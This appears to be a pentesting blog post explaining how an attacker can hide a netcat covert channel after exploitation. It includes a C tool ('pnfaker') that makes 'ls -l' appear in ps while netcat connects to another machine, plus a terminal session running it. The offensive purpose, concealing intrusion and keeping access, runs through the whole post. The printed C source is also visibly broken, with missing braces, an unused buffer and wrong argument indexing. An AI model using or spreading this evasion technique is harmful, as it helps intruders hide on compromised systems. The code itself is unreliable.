How to disguise a covert channel with netcat like a harmless command

white and black robot toy

One of the most important steps after the post-exploitation is to cover our activities and maintain access to the target.

In Linux, BSD or Unix we can easily disguise a process name to hide our covert operations. We can abuse the C function execv() to show one command but execute one completely different.

Learn Pentesting like a Pro
🥷 The Art of Pentesting: Post-exploitation like an APT
Linux Post-exploitation Check wrong permissions: Find setuid binaries: find / -perm -4000 -ls 2> /dev/null Find files world writable: find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null Find directories world writable…
Read more

In the example below if we list the machine processes we will notice that he is executing:

ls -l

Which is really harmless, when in reality the attacker is executing netcat to establish communication with another machine:

/usr/bin/nc -nv 8080

That’s how it looks like:

Using pnfaker to diguise a covert channel using netcat
└─$ git clone
Cloning into 'pnfaker'...
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 9 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (9/9), done.
└─$ cd pnfaker/
└─$ ls
└─$ gcc pnfaker.c -o pnfaker
└─$ ls
pnfaker  pnfaker.c
└─$ ./pnfaker "/usr/bin/ls -l" /usr/bin/nc -nv 8080 &
[1] 2413
└─$ pnfaker: Process' name faker
by defensahacker

(UNKNOWN) [] 8080 (http-alt) open

└─$ ps -f
UID          PID    PPID  C STIME TTY          TIME CMD
kali        2367    2360  0 14:11 pts/2    00:00:00 bash -l
kali        2413    2367  0 14:12 pts/2    00:00:00 /usr/bin/ls -l
kali        2414    2367  0 14:12 pts/2    00:00:00 ps -f

Here is the source code:

 * pnfaker.c
 * Process name faker for linux/BSD/Unix
 * usage: pnfaker "faked program name" real_program args
 * example: pnfaker "/bin/ls -la" /usr/bin/nc -vn 443
 * by defensahacker

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
   char **args, buf[256];
   int i, n, len;

   n= argc-2;
   len= strlen(argv[1]);

   printf("pnfaker: Process' name faker\n\
by defensahacker\n\n");

   if (argc < 3) {
     printf("usage: pnfaker \"faked program name\" real_program args\n\
example: pnfaker \"/bin/ls -la\" /usr/bin/nc -vn 443\n");
     return -1;

   memset(buf, ' ', sizeof(buf)-1); // pad the buffer
   buf[sizeof(buf)-1]= 0;
   args= (char**) malloc(n*sizeof(char**) + 1);

   for (i=0; i<len; i++)
     buf[i]= argv[1][i];

   for (i=3; i <= argc; i++)
    args[i-2]= argv[i];
   execv(argv[2], args);
   printf("Unexpected error! :(\n");
   return -1;

Download code from here:






Leave a Reply

Your email address will not be published. Required fields are marked *